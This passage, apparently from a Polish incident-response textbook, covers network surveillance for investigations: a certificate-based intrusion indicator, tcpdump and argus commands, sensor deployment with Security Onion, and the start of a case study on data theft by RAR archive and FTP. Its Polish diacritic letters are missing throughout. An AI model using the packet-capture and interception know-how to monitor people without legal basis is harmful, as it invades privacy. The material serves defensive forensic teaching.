Czego szuka ten wskanik? Z informacji zawartych w raporcie APT1 czytamy, e certyfikat
mona zidentyfikowa po numerze seryjnym, datach wanoci, nazwie wystawcy i jeszcze kilku
innych cechach. Specjalici z Emerging Threats postanowili wykorzysta kombinacj numeru
seryjnego certyfikatu i nazwy wystawcy. Pierwszy acuch treci, zaczynajcy si od 7c a2, to
numer seryjny certyfikatu. acuchy drugi i trzeci identyfikuj trzy bajty 0x55, 0x04 oraz 0x03,
po ktrych znajduj si (na pozycjach od 1. do 13. bajta) bajt 0x0c i acuch ASCII mail.aol.com.
Razem acuchy te identyfikuj wystawc certyfikatu. Jest to bardzo solidny wskanik z niewielkim
ryzykiem zgaszania faszywych alarmw.
Rejestrowanie nagwkw i caych pakietw

Cae pakiety rejestruje si z dwch rnych powodw, ktre maj wpyw na sposb obsugi tych
informacji. Pierwszy powd to zbieranie danych przesyanych midzy systemami, aby pomc
zespoowi RI w wygenerowaniu sygnatur, monitorowaniu aktywnoci oraz identyfikacji danych,
ktre mogy zosta skradzione. Drugi powd to zbieranie dowodw na potrzeby ledztwa
wewntrznego lub postpowania prawnego. Te dwa cele mog si czasami przeplata, poniewa
na pocztku ledztwa czsto nie wiadomo, czy sprawa zakoczy si postpowaniem administracyjnym,
czy sdowym. Decyzja na temat sposobu obsugi danych czsto jest uzaleniona od tego, co jest
monitorowane. Jeli w toku ledztwa musisz przechwytywa cay ruch sieciowy pochodzcy
z korporacyjnego serwera DNS Windows, inny ni przechodzcy przez porty TCP lub UDP 53,
jest to inna sytuacja, ni gdyby trzeba byo przechwytywa cay ruch generowany przez sprzedawc
podejrzanego o przekazywanie informacji konkurencji. W drugim przypadku obsuga i przechowywanie
danych wymagaj dodatkowych zabiegw. Czsto jest tak, e jeeli na pocztku nie wiadomo, dokd
zaprowadzi nas ledztwo, najlepszym rozwizaniem jest traktowanie wszystkich przechwytywanych
danych jak potencjalnych dowodw. Znacznie lepiej tworzy obszerniejsz dokumentacj
na pocztku i rozluni si w miar rozwoju sytuacji, ni mierzy si z konsekwencjami braku
dokumentacji od samego pocztku.
Sposb przechwytywania danych zaley te od celu ledztwa. Jeeli dane maj by przechwytywane
w reakcji na definiowalne zdarzenie, systemy IDS mog zachowa ca interesujc nas sesj.
Funkcja ta pozwala na szybkie zebranie szkodliwego oprogramowania, skradzionych danych
i caych interaktywnych sesji logowania do analizy. Nie polecamy jednak polega w takich
przypadkach na programie Snort i innych platformach IDS. Uwaamy, e lepiej skorzysta
z narzdzi tcpdump lub Wireshark.
Monitorowanie kompletnych pakietw pozwala pozyska surowe pakiety z sieci. Jest to
najwierniejsze odwzorowanie, poniewa reprezentuje prawdziw komunikacj midzy komputerami.
Poniej znajduje si cay przechwycony pakiet wywietlony za pomoc narzdzia tcpdump:
23:47:27.276812 c8:2a:14:16:1d:fb (oui Unknown) > 00:00:24:cd:7f:8c (oui Unknown),

ethertype IPv4 (0x0800), length 142: (tos 0x0, ttl 64, id 64092, offset 0,
flags [DF], proto TCP (6), length 128, bad cksum 0 (->4a21)!)
192.168.2.40.49279 > kpn.ntop.org.http: Flags [P.], cksum 0xf66c
(incorrect -> 0x230c), seq 1:77, ack 1, win 8235, options
[nop,nop,TS val 2133023077 ecr 54933409], length 76
0x0000: 0000 24cd 7f8c c82a 1416 1dfb 0800 4500 ..$....*......E.
0x0010: 0080 fa5c 4000 4006 0000 c0a8 0228 6da8 ...\@.@......im.
0x0020: 6fdf c07f 0050 ac23 b71b b3bd d493 8018 o....P.#. ......
0x0030: 202b f66c 0000 0101 080a 7f23 5965 0346 .+.l. .....#Ye.F
0x0040: 37a1 4745 5420 2f20 4854 5450 2f31 2e31 7.GET./.HTTP/1.1
0x0050: 0d0a 5573 6572 2d41 6765 6e74 3a20 6375 ..User-Agent:.cu
0x0060: 726c 2f37 2e33 302e 300d 0a48 6f73 743a rl/7.30.0..Host:
0x0070: 2077 7777 2e6e 746f 702e 6f72 670d 0a41 .www.ntop.org..A
0x0080: 6363 6570 743a 202a 2f2a 0d0a 0d0a ccept:.*/*....
Ten 142-bajtowy pakiet reprezentuje danie HTTP GET wysane z systemu o adresie IP
192.168.2.40. Zawiera ramk Ethernet, nagwek IPv4, nagwek TCP oraz tre waciw.
Nie opisujemy szczegw budowy pakietw sieciowych, mimo e to bardzo ciekawe zagadnienie.
Jeli interesuje Ci ten temat, zajrzyj do ksiki W. Richarda Stevensa pt. TCP/IP Illustrated, Vol. 1:
The Protocols. Poza tym w internecie jest mnstwo miejsc, w ktrych rwnie moesz poszerzy
swoj wiedz w tym zakresie.
Przechwytywanie nagwkw polega po prostu na przejmowaniu tylko czci pakietw.
Celem tej czynnoci jest zebranie nagwkw Ethernet, IP oraz TCP lub UDP i pobranie tylko
niewielkiej iloci danych uytkownika. Robi si to poprzez ograniczenie iloci pobieranych danych
do pierwszych 64 bajtw kadego pakietu. Do tej pory nagwkw pakietw potrzebowalimy
tylko do narzdzi do analizy statystycznej oraz gdy pracowalimy na zlecenie agencji pilnowania
porzdku publicznego. Przechwytywanie nagwkw jest pod wieloma wzgldami rwnowane
z posugiwaniem si tradycyjnymi metodami trap and trace i w niektrych krgach pojcia te s
nawet uywane zamiennie. Jeli kiedykolwiek bdziesz chcia przechwytywa dane uytkownikw,
pamitaj, aby najpierw powiadomi swojego radc prawnego. Prawnicy bardzo nie lubi niespodzianek.
Modelowanie statystyczne
Monitorowanie statystyczne koncentruje si na oglnej obserwacji pocze przechodzcych
przez sie. Modelowanie ruchu sieciowego jest najbardziej przydatne na tych etapach ledztwa,
gdy punkty kocowe nie s cakiem widoczne. Sytuacja taka zdarza si, gdy co cay czas si dzieje
i nie wiadomo, dlaczego. Aby wygenerowa uyteczne dane, wikszo programw przechwytuje
lub przetwarza nagwki protokow przez pewien czas, a nastpnie przedstawia informacje
na podstawie interpretacji czasu i struktury pakietw.
Wikszo organizacji generuje dane do analizy w postaci pakietw NetFlow. Dane tego typu
mona uzyska z urzdze sieciowych CISCO i innych mogcych uruchomi odpowiedniego
agenta. Ten rodzaj strumienia danych zawiera licznik bajtw i pakietw dla kadego przepywu
lub sesji, zaobserwowanych przez urzdzenie. Ewentualnie mona wykona zrzut PCAP plikw
i rcznie przepuci je przez sond NetFlow. W obu przypadkach istnieje kilka moliwoci analizy
i wizualizacji danych. Wiodcymi producentami oprogramowania do analizy pakietw NetFlow s

firmy Fluke, HP, Solarwinds oraz IBM. W rozdziale tym opisujemy narzdzia z otwartym kodem
rdowym, czyli argus i flow-tools.
W INTERNECIE
argus, system do analizy ruchu sieciowego www.qosient.com/argus/
flow-tools code.google.com/p/flow-tools/
Gdy informacje s dostpne, szukamy w nich wzorcw za pomoc narzdzi flow-tools lub
argus. Generalnie, kiedy wykonujemy analiz pakietw NetFlow, to albo szukamy odpowiedzi
na bardzo konkretne pytanie (np. czy w czasie trwania ataku wycieka ze rodowiska dua ilo
danych), albo szukamy ladw komunikacji charakterystycznych dla czenia si z serwisem
bazowym lub innych szkodliwych rodzajw komunikacji (skanowanie portw, podejrzany ruch
przepywajcy w kierunku odwrotnym ni spodziewany itd.).
W poniszym przykadzie mamy kompletny zrzut krtkiej sesji o czasie trwania tylko omiu
minut. Zrzut ten zosta wykonany przez narzdzie tcpdump w celu monitorowania podsieci
zawierajcej kilka serwerw sieciowych. Przeanalizujemy otrzymany plik PCAP, aby dowiedzie
si, czy na serwerach nie ma jakiej podejrzanej aktywnoci. Jest to troch wydumany przykad,
ale statystyki, ktre pokazujemy, mona atwo wykry innymi sposobami szczeglnie wtedy,
kiedy w sieci s dobre reguy wyjciowe.
Aby przekonwertowa plik PCAP na plik danych odpowiedni dla klientw danych argus,
wykonujemy nastpujce polecenie:
argus -mAJRU 512 -r serverFarm_1.pcap -w serverFarm_1.pcap.arg3
Podczas przetwarzania danych staramy si zatrzyma jak najwicej pl, aby zredukowa ryzyko
powtrnego przetworzenia informacji. Powysze polecenie zachowuje adresy MAC (m), metryki
bajtw aplikacji (A), dane o wydajnoci pakietw (J), czasy odpowiedzi (R) oraz 512 bajtw danych
aplikacji (U). Narzdzie argus odczytuje (-r) standardowy plik w formacie PCAP i zwraca wyniki (w)
do formatu czytelnego dla pakietu narzdzi argus. Plik ten jest nastpnie gotowy do dalszej analizy.
Przyjrzymy si danym z podejrzanego ruchu wyjciowego, szczeglnie HTTP, poniewa wiemy,
e niektre ataki polegaj na pobraniu drugiej czci kodu z serwisw zewntrznych:
ragraph dbytes dport -M 1s -fill -stack -r serverFarm_1.pcap.arg3 - tcp and
dst bytes gt 68 host server1
Polecenie to (wykorzystujce plik binarny ragraph narzdzia argus) generuje wykres supkowy
przedstawiajcy liczb bajtw docelowych wg portu docelowego dla caego ruchu TCP wychodzcego
z hosta o nazwie server1, ktrych docelowy rozmiar przekracza 68 bajtw. Wyniki pokazano na
rysunku 9.1. Jak wida, jedyny ruch przekraczajcy rozmiar 68 odbywa si przez protokoy HTTP
i HTTPS. O godzinie 15:34 zanotowano nagy wzrost aktywnoci dochodzcy do 3,8 Mbps.
Minuta ta moe by dobrym punktem do rozpoczcia analizy na serwerze.
RYSUNEK 9.1. Nieoczekiwany ruch na serwerze
Czy ten nagy wzrost pasuje do jakiego nawracajcego wzorca? Wykonamy polecenie ragraph
jeszcze raz, ale dodamy do niego opcj -log, aby mona byo przejrze dane utracone z powodu
automatycznego skalowania. Na rysunku 9.2 przedstawiono wersj wykresu z osi y w zmienionej skali.
RYSUNEK 9.2. Nieoczekiwany ruch na serwerze skala log

Nie wyglda na to, aby ten rodzaj komunikacji odbywa si okresowo (przynajmniej nie w krtkim
okresie przechwyconym w tym pliku PCAP), ale teraz widzimy, e wystpi 75-sekundowy transfer,
ktry rozpocz si okoo godziny 15:29:25. To rwnie moe by warte uwagi, jeli serwer nie
powinien nawizywa pocze HTTPS.
TWORZENIE SYSTEMU MONITOROWANIA SIECI

Wkrtce po przybyciu na miejsce chcemy rzuci okiem na punkty wyjciowe. Zanim
sformalizowalimy nasz program monitorowania sieci, w biurach i centrach danych czsto
wykorzystywalimy laptopy i serwery 1U wraz ze sprztowymi podsuchami sieciowymi.
Wasne rozwizanie zoone z narzdzi Snort i tcpdump zapewnia nam odpowiedni elastyczno,
zwaszcza gdy administratorzy sieci ju wczeniej wdro systemy wykrywania intruzw.
Generalnie platformy IDS nie mog by niezawodne w jednoczesnym wykrywaniu intruzw
i inwigilacji sieci. Z pewnoci da si to zrobi, ale pamitaj, e gdy nakaesz czujnikowi IDS
rozpocz przechwytywanie caej treci, jego efektywno jako czujnika spadnie.
Konfiguracja monitora do inwigilacji sieci wymaga zaplanowania i przygotowa. Moliwoci
wdroenia monitora zale od architektury sieci, szerokoci pasma, tego, w jakim celu wykorzystywany
jest dany segment, oraz od wielu nietechnicznych czynnikw, takich jak zasady obowizujce w firmie
i ograniczenia budetowe.
Oto, co musisz zrobi, by powstaa procedura tworzenia skutecznego systemu do inwigilacji sieci.
Zdefiniuj cele prowadzenia inwigilacji sieci.
Upewnij si, e masz podstawy prawne do prowadzenia monitoringu.
Kup i zaimplementuj odpowiedni sprzt i oprogramowanie.
Zapewnij bezpieczestwo platformie zarwno pod wzgldem elektronicznym,
jak i fizycznym.
Zapewnij odpowiednie umieszczenie monitora w sieci.
Sprawd dane przechwytywane przez monitor, aby upewni si, e speniaj Twoje kryteria.
Bd na ktrymkolwiek z tych etapw moe zmniejszy skuteczno monitoringu. Teraz
napiszemy, jak wybra sprzt i oprogramowanie oraz zaprojektowa i oceni wasny monitor.
Wybr sprztu
Do wyboru s dwie moliwoci kupno gotowego systemu lub budowa wasnego monitora sieci.
Najwaniejsze jest to, aby system mia wystarczajco du moc, co pozwoli mu wykonywa swoje
funkcje. Zbieranie i zapisywanie wszystkich pakietw przechodzcych przez szybkie cza moe
by bardzo trudne. Organizacje posiadajce szybkie cza powinny zaopatrzy si w wysokiej klasy
sprzt do monitorowania sieci.
Co kupi
Na rynku dostpnych jest kilka systemw umoliwiajcych przechwytywanie i zapisywanie

danych w sieciach o duej szybkoci przesyania. Biorc pod uwag to, jak szybko nowe firmy
pojawiajce si w tej brany s wykupywane, stwierdzamy, e jakakolwiek lista odnonikw
nie ma sensu, poniewa staaby si nieaktualna w cigu roku. Dlatego zalecamy ledzenie
dziaalnoci zespow programistycznych lub ich gwnych programistw. W czasie pisania tej
ksiki najbardziej efektywne i najwygodniejsze w obsudze patne systemy do analizy sieci
produkoway zespoy inynierw z Solera Networks i NetWitness.
Wiele organizacji jest skazanych na rozwizania wasnej roboty. Pod niektrymi wzgldami
s one nawet lepsze od gotowych rozwiza, poniewa mona je dokadnie dostosowa do swoich
potrzeb. Zawsze naley wybiera stabiln i solidn platform, ktrej jedynym zadaniem bdzie
inwigilowanie sieci. Nasz system monitoringu skada si z serwerw 1U duych producentw,
na ktrych moemy polega w razie awarii sprztu. Zazwyczaj zalecamy dwie gotowe dystrybucje,
oparte na systemie operacyjnym GNU/Linux. Kady wie, e stabilna platforma uniksowa bije pod
wzgldem wydajnoci wszystkie inne platformy. Do niedawna najbardziej efektywne rodowisko
do przechwytywania danych zapewnia system FreeBSD. Jednak postpy, jakie poczynia grupa
NTOP w pracach nad gniazdem PF_RING, sprawiy, e postanowilimy w naszej platformie zastpi
jdro FreeBSD jdrem Linuksa. Aby korzysta z nowych moliwoci, trzeba umie utrzymywa
moduy jdra dla uywanej przez siebie wersji Linuksa, a programici jdra Linuksa przyznaj,
e PF_RING NTOP jest lepszy od ich interfejsu AF_PACKET i wciel go do jdra.
W INTERNECIE
Porwnywanie i ulepszanie narzdzi do przechwytywania pakietw zbudowanych z oglnodostpnego
sprztu (2010) conferences.sigcomm.org/imc/2010/papers/p206.pdf
Przechwytywanie pakietw w rodowiskach Ethernet 10-Gigabit przy uyciu oglnodostpnego sprztu (2007)
www.net.t-labs.tu-berlin.de/papers/SWF-PCCH10GEE-07.pdf
Gdy zaczynamy ledztwo, pocztkowo dziaamy taktycznie i nie mamy dostpu do dugo
dziaajcych systemw monitoringu. W takiej sytuacji jest wikszo organizacji, ktre zostaj
powiadomione o wystpieniu wamania. Kiedy trzeba szybko wdroy technologi monitorowania,
nie ma nic lepszego ni podsuch sieciowy (albo solidny port SPAN) poczony z czujnikiem Snort
przez narzdzie tcpdump. Z drugiej strony, jeeli masz rodki na zainstalowanie rozwizania
monitorujcego przed wystpieniem incydentu, istnieje kilka rozwiza czcych styl alarmowania
Snort z przechowywaniem informacji.
W 2013 roku dostpne byy dwa pakiety, ktre zawsze polecalimy organizacjom chccym wdroy
wasny system monitoringu. Pierwszy z nich to urzdzenie firmy Solera Networks o nazwie DeepSea,
a drugi to platforma NetWitness firmy RSA. Jeli przyzwyczaie si do prostoty rozwizania Snort,
wymienione narzdzia komercyjne mog wywoa u Ciebie szok. W zalecanych konfiguracjach

instalacji oba dziaaj w hierarchii. Czujniki przekazuj dane do kolektorw, ktre z kolei s
odpytywane przez stacje robocze uytkownikw i serwery zarzdzajce.
Jako e sposb obsugi czujnikw w rozwizaniach komercyjnych jest dobrze opisany
w dokumentacji, dalej koncentrujemy si na rozwizaniach open source. Sposb postpowania
jest podobny, niezalenie od tego, czy instaluje si platform do dugotrwaego monitoringu,
czy dziaa pod presj w trakcie ledztwa.
Instalacja gotowej dystrybucji

Jeli nie masz w swoim zespole dowiadczonych specjalistw od Linuksa (potraficych modyfikowa
jdro) oraz nie dysponujesz spor iloci czasu, najlepszym rozwizaniem moe by skorzystanie
z gotowej dystrybucji czujnikowej. Na pocztek polecamy dystrybucj Security Onion (SO). System
ten mona zainstalowa z obrazu dysku ISO lub w swojej ulubionej dystrybucji Linuksa. SO wykonuje
w systemie operacyjnym i jdrze wszystkie zmiany potrzebne do utworzenia niezawodnej platformy.
W INTERNECIE
Strona internetowa Security Onion www.securityonion.net
Programici Security Onion utrzymuj specjalnie dostosowan dystrybucj Xubuntu zawierajc

wszystkie potrzebne programy i zalenoci. Dystrybucja ta jest dostpna w formie obrazu ISO, z ktrego
mona utworzy rozruchowy nonik DVD albo napd USB. Aby po uruchomieniu systemu z wybranego
nonika rozpocz prac z podstawow instalacj, naley wykona nastpujce czynnoci (bardziej
szczegowe informacje mona znale na stronie SO).
1. W pocztkowym menu rozruchowym wybierz opcj install - start the installer directly
(zainstaluj uruchom instalator bezporednio).
2. Gdy system si uruchomi, dwukrotnie kliknij przycisk Install Security Onion
(zainstaluj Security Onion).
3. W kolejnych oknach zaakceptuj domylne ustawienia i wprowad odpowiednie informacje.
4. Po kilku minutach instalacja zakoczy si i system zostanie uruchomiony ponownie.
5. Zaloguj si i kliknij dwukrotnie przycisk Setup (konfiguracja). W systemie zostan
wprowadzone pewne zmiany i nastpi jego ponowne uruchomienie.
6. Zaloguj si i dwukrotnie kliknij przycisk Setup. Zatwierd kolejne propozycje i wybierz
opcj Quick Setup (szybka instalacja). Nastpnie wybierz interfejs sieciowy, ktry chcesz
monitorowa. Gdy zostanie wywietlona propozycja instalacji ELSA, wybierz YES (tak).
7. Instalacja potrwa kilka minut.
8. Na pulpicie pojawi si hipercza do wysokopoziomowych narzdzi SO. Ewentualnie
moesz przej pod adres IP przypisany do systemu na porcie HTTPS, aby wywietli
stron z wygodnymi odnonikami.
Monitorowanie rozpoczyna si natychmiast po zakoczeniu instalacji. Pamitaj, e niektre

z internetowych narzdzi SO, np. Snorby i Squert, nie wywietlaj zdarze na bieco.
W INTERNECIE
Wprowadzenie do Security Onion code.google.com/p/security-onion/wiki/IntroductionToSecurityOnion
W rozdziale tym skupiamy si tylko na wybranym podzbiorze funkcji platformy SO. Uywane
przez nas narzdzia s instalowane wraz z bardzo przydatnymi aplikacjami do zarzdzania
czujnikami i alarmami. Zalecamy dokadnie zapoznanie si z wprowadzeniem do Security Onion
oraz poeksperymentowanie z tym systemem, zanim wdroy si go w organizacji.
Wdraanie czujnika sieciowego

Umiejscowienie czujnika sieciowego (lub czasami podsuchu obsugujcego kilka urzdze
monitorujcych) jest prawdopodobnie najwaniejszym czynnikiem, jaki naley uwzgldni przy
konfiguracji systemu monitorowania. Kluczowe jest dokadne poznanie rodowiska sieciowego, dlatego
zanim zaczniesz prac, zbierz odpowiednich ludzi, ktrzy znaj odpowiedzi na nastpujce pytania.
Gdzie znajduj si punkty wyjciowe sieci?
Czy w sieci wykorzystywane s specjalne trasy do kontrolowania ruchu wewntrznego
lub zewntrznego?
Czy na granicach administracyjnych lub organizacyjnych dostpne s punkty dawice?
W jakiej postaci ruch z punktw kocowych dociera do zapr sieciowych lub
punktw dawicych? Czy stosowany jest np. trunking VLAN?
Gdzie znajduj si urzdzenia do translacji adresw sieciowych i sieciowe serwery proxy?
Wszystkie te czynniki maj wpyw na umiejscowienie czujnikw sieciowych oraz wykorzystywane
oprogramowanie. Jeeli np. monitorowany punkt kocowy oznacza ruch VLAN, moesz zdefiniowa
konfiguracj dla wybranego znacznika VLAN. Jeli monitorowany punkt jest poczeniem
szerokopasmowym, moesz wdroy kilka czujnikw i poszuka sposobu na podzielenie sesji.
Nie wahaj si sugerowa powanych zmian w budowie sieci, jeli mog one pomc w ledztwie.
Incydenty czsto s wystarczajcym powodem do tego, by uzyska zgod na wprowadzenie takich
modyfikacji, ktre ulepsz konfiguracj. Czasami incydent jest w stanie nakoni niektre osoby
do zniesienia tymczasowych niedogodnoci podczas wprowadzania zmian.
Niedawno prowadzilimy ledztwo dla firmy majcej ponad czterdzieci biur oddziaowych,
z ktrych kade miao wasne cze internetowe. Cho ruch firmowy by przesyany przez tunele
IPSec do centralnego miejsca, kada jednostka kierowaa ruch internetowy przez bram lokaln.
Konfiguracja ta nie wspgraa z kompletnym systemem monitoringu. Nowy dyrektor dziau IT
skorzysta z okazji, aby w caej organizacji zaimplementowa technik MPLS (ang. Multiprotocol
Label Switching). Dziki temu to, co kiedy byo trudnym zadaniem zarzdzania czujnikami,
stao si atwe dwa czujniki do monitorowania ruchu wewntrznego i zewntrznego.
Ponadto czujnik powinien znajdowa si w lokalizacji bezpiecznej fizycznie. Jeli wdraasz

system do inwigilacji sieciowej, musisz zabezpieczy go w zamykanym pomieszczeniu, do ktrego
dostp ma tylko kilka zaufanych osb. Gdyby trzeba byo przechwytywa dane do uytku
w postpowaniu administracyjnym lub sdowym, pamitaj o ich odpowiednim przechowywaniu.
W tradycyjnym pojciu bezpieczestwa informacji pamitaj, aby zabezpieczy monitor w taki
sam sposb, w jaki zabezpieczyby kady inny system uniksowy. Chro go przed nieuprawnionym
dostpem i instaluj aktualizacje. I oczywicie prowad obszern dokumentacj. Pamitaj, e
konfiguracja i bezpieczestwo czujnika s bardzo wane dla wartoci potencjalnych dowodw,
ktre za jego pomoc mona zdoby. Przegldaj dzienniki i rozwa moliwo uycia takich
narzdzi jak Tripwire do okresowego sprawdzania, czy platforma wci moe by wartociowym
rdem materiau dowodowego.
Ocenianie jakoci monitora sieciowego

Po zbudowaniu platformy ocenie naley podda przede wszystkim dwie rzeczy. Czy monitor
otrzymuje ten ruch, ktry chcesz monitorowa, oraz czy sprzt ma wystarczajc moc, aby spenia
swoj funkcj. Sprawdzenie czujnika pod tym ktem wydaje si oczywiste. Jednak nie raz
spotykalimy si z sytuacj, w ktrej zesp niewiadomy tego, jak w sieci przekazywany jest ruch,
konfigurowa czujnik tylko po to, aby po kilku tygodniach analitycy odkryli, e interesujcy ich
ruch przechodzi przez inn bram. Nie bdziemy rozwodzi si nad sposobami rozwizywania
takich problemw, ale zalecamy utworzenie kilku sygnatur powodujcych alarm przez okrelony
ruch, ktry moe zosta wygenerowany przez kadego. Przykadowo moe wystarczy wczanie
alarmu systemowego, gdy kto z zewntrz firmy prbuje otworzy nieistniejc stron. Mona
poprosi dowolnego pracownika z wybranego biura, aby wszed pod okrelony adres powodujcy
aktywacj naszego wskanika. Wprawdzie w ten sposb nie weryfikuje si caego zbioru sygnatur,
ale mona rozwiza problemy z umiejscowieniem czujnika, urzdzeniami SPAN lub podsuchami
oraz dekodowaniem zakapsukowanych danych. Ponadto dokadnie przygldaj si statystykom
generowanym przez oprogramowanie. Programy Snort i Suricata rejestruj informacje o wydajnoci,
z ktrych mona si dowiedzie, czy czujnik gubi pakiety. Jeli co takiego nastpi, dobrze przyjrzyj si
swoim sygnaturom. Bardzo czsto jest tak, e le napisane sygnatury powoduj gubienie pakietw
przez programy, poniewa obsugujcy je mechanizm nie nada. W niektrych przypadkach
przyczyn problemw mog by sterowniki lub sprzt. Objto danych lub szybko przychodzenia
pakietw mog by zbyt due dla sterownika i wwczas nie bdzie on nada z przetwarzaniem
przychodzcego do niego ruchu.
ANALIZA DANYCH SIECIOWYCH

Zgromadzone dane sieciowe trzeba jako przeanalizowa. W podrozdziale tym przedstawiamy dwa
scenariusze i analizujemy dane przechwycone z sieci za pomoc popularnego pakietu Wireshark.
Nie jest to oczywicie jedyne takie narzdzie, ale wybralimy wanie je, poniewa jest popularne,
darmowe, ma otwarty kod rdowy oraz wystpuje w wersjach dla rnych platform.
Ponadto mona tworzy wasne dekodery w jzykach C i LUA. Ju samo to sprawia, e narzdzie
to jest niezwykle przydatne dla specjalistw, ktrzy mog mie do czynienia ze szkodliwymi
programami potraficymi wykorzysta sie. Jeli jednak wolisz uy innego narzdzia, nic nie stoi
na przeszkodzie. Zawsze zachcamy do poznawania wielu rnych narzdzi o podobnym
przeznaczeniu. Daje to niezaleno i pozwala zweryfikowa poprawno procesw. Jeeli dane
wymagaj dekodowania lub interpretacji, moesz je przepuci przez kilka rnych programw
lub procesw, aby sprawdzi, czy wyniki za kadym razem bd takie same. Do czsto zdarza si,
e jakie narzdzie pozornie dziaa bez zarzutw, a w rzeczywistoci pomija wane informacje.
Weryfikacja procesw jest szczeglnie wana podczas pracy z wasnymi narzdziami i filtrami.
Analizy danych sieciowych wykonywane podczas ledztwa z reguy staramy si ogranicza,
tzn. jeli nie mamy wanych powodw, nie prbujemy znajdowa nowych zagroe w sieciowej
gmatwaninie danych. Jak napisalimy wczeniej, w analizie danych skupiamy si na tropach
i szukaniu odpowiedzi na postawione uprzednio pytania. Nieczsto mona nas przyapa
na analizowaniu piciu terabajtw nieprzefiltrowanych danych sieciowych z gwnego cza
internetowego firmy albo przeszukiwaniu zeszorocznych rekordw DNS w celu wykrycia
wzorcw to s zadania raczej dla dziau bezpieczestwa IT albo badawczego. W czasie
incydentu pali si budynek, w ktrym s ludzie, dlatego trzeba bardzo si skupi.
Na podstawie tych spostrzee sporzdzilimy dwa scenariusze, ktre pomog Ci bliej pozna
metody przegldania danych sieciowych. Jako e chcemy nauczy Ci samodzielnego wykonywania
analiz, na stronie internetowej tej ksiki zamiecilimy pliki zawierajce zrzut pakietw sieciowych.
Scenariusze s oparte na prawdziwych zdarzeniach nie s to tylko eksperymenty. Jeli kto
korzysta z naszych usug, moe pomyle, e opisalimy wanie wydarzenia z jego firmy,
ale hakerzy stosuj podobne metody w wielu przypadkach. Innymi sowy, s to bardzo typowe
i powszechnie wystpujce przykady atakw.
Pierwszy scenariusz dotyczy prostej kradziey danych haker kompresuje dane do formatu
RAR i wysya je za pomoc FTP do serwera zewntrznego. Drugi scenariusz dotyczy konsoli
sieciowej napisanej w jzyku PHP, ktr haker zainstalowa na serwerze sieciowym w strefie
zdemilitaryzowanej (DMZ) i ktr wykorzysta do przeprowadzenia rekonesansu w sieci.
Dla uproszczenia zakadamy, e zaatakowane jednostki miay zaimplementowane rozwizania
do kompletnego monitorowania sieci oraz e mamy dostp do ich danych.
Skoro mowa o danych, pewnie zastanawiasz si, jak technik przechwytywania danych
sieciowych zastosujemy. W czasie incydentu dane sieciowe najczciej pozyskujemy w formie
plikw z przechwyconymi pakietami (PCAP), ktre eksportujemy z narzdzia monitorujcego.
Plik z przechwyconymi pakietami, tzw. PCAP, to w istocie standardowy format plikw do
przechowywania przechwyconych danych sieciowych. Format ten obsuguj prawie wszystkie
narzdzia sieciowe przetwarzajce takie dane. A niektre z nich dodatkowo odczytuj take wiele
innych formatw. Niezalenie od tego, czy tworzysz zrzuty samodzielnie, czy otrzymujesz je
od innego zespou, zalecamy posugiwanie si formatem PCAP, ktry jest powszechnie znany.
Tyle tytuem wstpu. Teraz moemy przej do szczegowego opisu pierwszego z naszych
scenariuszy, dotyczcego kradziey danych.
Kradzie danych
Jest ciemna i burzowa noc 3 grudnia 2013 roku. W toku ledztwa odkrywasz, e dwa dni wczeniej
haker wama si do komputera uytkownika oraz wykona w nim pliki rar.exe i ftp.exe, kady
jeden raz. RAR to program do archiwizacji danych czsto wykorzystywany przez wielu hakerw
do czenia i kompresowania plikw, ktre chc ukra, w jeden plik. Pojedynczy skompresowany
plik o wiele atwiej przesa poza zaatakowan sie ni wiele mniejszych plikw. Program fpt.exe
to klient FTP sucy do pobierania i wysyania plikw na serwer FTP. W tym przypadku dowody
znalezione na hocie nie pozwalaj stwierdzi, w jakim dokadnie celu zostay wykorzystane te
dwa programy wykryto tylko fakt ich uruchomienia. Dziki rozmowom przeprowadzonym
z przedstawicielami firmy wiadomo jednak, e taka aktywno nie jest norm w tym systemie.
Kierownictwo firmy bardzo chce si dowiedzie, co si wydarzyo, a skpa ilo szczegw
sprawia, e pyta jest wicej ni odpowiedzi. Cho scenariusz ten pasuje do typowego wzorca
kradziey danych, naley sprawdzi, czy rzeczywicie do tego doszo, a take zbada, co ewentualnie
skradziono i gdzie to wysano. Na szczcie w organizacji przechowuje si kompletne zrzuty ruchu
sieciowego z trzech ostatnich dni. Za ich pomoc powinno si uda rozwiza zagadk. Na niektre
pytania chyba uda si odpowiedzie po analizie nagwkw lub danych NetFlow, cho pena tre
z pewnoci pozwoli lepiej zorientowa si w sytuacji. Zobaczmy wic, do czego mog si przyda
przechwycone dane sieciowe.
Pierwsz nasz czynnoci bdzie znalezienie sesji FTP. Wiemy, e zosta uruchomiony program
ftp.exe, co sugeruje, e haker mg przesa dane za pomoc klienta FTP. Dowodem na to by plik
pobierany z wyprzedzeniem z systemu Windows, wskazujcy na jednorazowe uruchomienie programu,
wic dodatkowo wiemy, kiedy dokadnie to miao miejsce 1 grudnia 2013 roku o godzinie 00:57
UTC. Ewentualnie moglibymy w dziennikach DHCP sprawdzi adres IP systemu, ale nie jest to
konieczne, poniewa znamy protok (FTP) i wiemy, kiedy dokadnie doszo do zdarzenia. Prac
zaczniemy wic od poszukania w przechwyconych danych sieciowych sesji FTP, ktre miay miejsce
interesujcego nas dnia. System zwraca list 73 sesji, ale tylko dwie z nich zdarzyy si w pobliu daty
i godziny, kiedy uruchomiono program ftp.exe. W obu tych sesjach wystpuje ten sam zewntrzny
adres IP, cho poczenia nawizano z dwch rnych wewntrznych adresw IP. Jedna z sesji miaa
miejsce dokadnie w czasie wskazywanym w dowodach, a druga okoo 15 minut wczeniej. Jako e obie
sesje obejmuj komunikacj z tym samym zewntrznym adresem IP, postanawiamy je przeanalizowa.
Eksportujemy je do plikw w formacie PCAP, ktry jest dobrze obsugiwany przez wszystkie
najwaniejsze narzdzia do analizy ruchu sieciowego. Nastpnie przechodzimy do analizy.
Wykorzystamy program Wireshark. Jest to jedno z najpopularniejszych narzdzi do analizy
pakietw sieciowych. Aplikacja ta ma graficzny interfejs uytkownika, obsuguje setki protokow
sieciowych oraz dziaa we wszystkich najwaniejszych systemach operacyjnych, a wic takich jak
Linux, Windows, BSD i OS X. Ponadto wiele funkcji programu jest te dostpnych w postaci
polece wiersza polece.
W INTERNECIE
Strona internetowa programu Wireshark www.wireshark.org
Jako e pierwszy trop dotyczy drugiej sesji, analiz rozpoczniemy wanie od niej. Pierwsza
sesja wydaje si powizana ze zdarzeniem, ale najpierw powinno si dokoczy badanie pierwszego
tropu, a dopiero potem zainwestowa czas i wysiek w analiz drugiego.
Szybkim sposobem na zbadanie, co si wydarzyo w pierwszej sesji, jest otwarcie pliku PCAP
